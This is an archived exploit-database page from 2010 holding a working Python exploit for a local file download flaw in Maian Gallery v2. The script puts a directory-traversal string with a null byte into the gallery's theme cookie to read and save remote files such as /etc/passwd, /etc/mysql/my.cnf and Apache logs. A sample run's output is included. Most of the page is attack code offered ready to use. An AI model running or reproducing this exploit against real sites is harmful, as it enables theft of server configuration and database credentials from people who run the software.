[webapps / 0day] - Maian Gallery v2 Local File Download Vuln
Posted on 18 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Maian Gallery v2 Local File Download Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: webapps / 0day | Exploit author: mr_me' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>================================================== Maian Gallery v2 Local File Download Vulnerability ================================================== #!/usr/bin/python # # This vulnerability uses file_get_contents() # so we have some limitations, we cant execute PHP # and we cant read files that the web server will # interpret such as PHP, conf etc # # tested on: Ubuntu Linux 2.6.32 with php v5.3.2 # register_globals = Off # # PRIVATE 0DAY - code by mr_me # Vulnerability found by my special PHP friend and is now patched, hence this PoC ;) # # mr_me@1337:~$ sudo ~/maian.py -p 127.0.0.1:8080 -t localhost -d /maian_gallery/ -o /home/mr_me/ # # | ------------------------------------------------------------- | # | -= Maian Gallery v2 Local File Download Exploit = | # | ---------------------------[ by mr_me ]---------------------- | # # (+) Checking target @: http://localhost/maian_gallery/ # # (+) Testing Proxy... # (+) Proxy working! 127.0.0.1:8080 # (+) Building Handler.. # (+) File download is working! # (+) Looking for remote configuration files and saving them to /home/mr_me/ # (+) Found file on remote host @ /var/log/apache2/access.log # (+) Found file on remote host @ /etc/mysql/my.cnf # (+) Found file on remote host @ /etc/passwd # (!) Done! # import sys, os, httplib, socket, urllib2, re from optparse import OptionParser usage= "./%prog [<options>] -t [target] -d [directory] -o [output dir to save files]" usage += " Example : ./%prog -p 203.167.876.54:80 -t localhost -d maian_gallery/" parser = OptionParser(usage=usage) parser.add_option("-p", type="string",action="store", dest="proxy", help="HTTP Proxy <server:port>") parser.add_option("-t", type="string", action="store", dest="target", help="The target server") parser.add_option("-d", type="string", action="store", dest="directory", help="The dir path to maian gallery") parser.add_option("-o", type="string", action="store", dest="outputDir", help="Output dir to save all files") (options, args) = parser.parse_args() def banner(): print " | ------------------------------------------------------------ |" print " | -= Maian Gallery v2 Local File Download Exploit =- |" print " | ---------------------------[ by mr_me ]--------------------- | " if len(sys.argv) < 4: banner() parser.print_help() sys.exit(1) def getProxy(): try: pr = httplib.HTTPConnection(options.proxy) pr.connect() proxy_handler = urllib2.ProxyHandler({'http': options.proxy}) except(socket.timeout): print " (-) Proxy Timed Out" sys.exit(1) except(),msg: print " (-) Proxy Failed" sys.exit(1) return proxy_handler dltest = "etc/passwd" dotDotSlash = '../../../../../../../../../' findAllFiles = ['/var/log/apache2/access_log', '/var/log/apache2/access.log', '/etc/mysql/my.cnf', '/etc/my.cnf', '/etc/passwd', '/etc/apache2/httpd.conf'] if options.target[0:6] != 'http://': options.target = "http://" + options.target def getRequest(localFile): if options.proxy: try: proxyfier = urllib2.build_opener(getProxy()) proxyfier.addheaders = [('Cookie', 'PHPSESSID=d0tcacup9euftbsb9kd7r55db3; mgallery_theme_cookie='+dotDotSlash+localFile+"%00")] check = proxyfier.open(options.target+options.directory).read() except urllib2.HTTPError, error: check = error.read() else: try: req = urllib2.Request(options.target+options.directory) req.add_header('Cookie', 'PHPSESSID=d0tcacup9euftbsb9kd7r55db3; mgallery_theme_cookie='+dotDotSlash+localFile+"%00") check = urllib2.urlopen(req).read() except urllib2.HTTPError, error: check = error.read() return check banner() print "(+) Checking target @: %s" % (options.target+options.directory) if options.proxy: print " (+) Testing Proxy..." print "(+) Proxy working! %s" % (options.proxy) print "(+) Building Handler.." check = getRequest(dltest) if re.findall("root:x:", check): print "(+) File download is working!" print "(+) Looking for remote configuration files and saving them to %s" % (options.outputDir) for f in findAllFiles: checkFile = getRequest(f) if len(checkFile) > 0: print "(+) Found file on remote host @ %s" % (f) filenames = f.split('/') try: ff = open(options.outputDir+filenames[len(filenames)-1]+'.txt','w') ff.write(checkFile) ff.close() except: print "(-) Cannot save remote files locally.. check your path" print "(!) Done! " else: print "(-) Target not vulnerable to the file download vulnerability" # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-18]</pre></body></html>
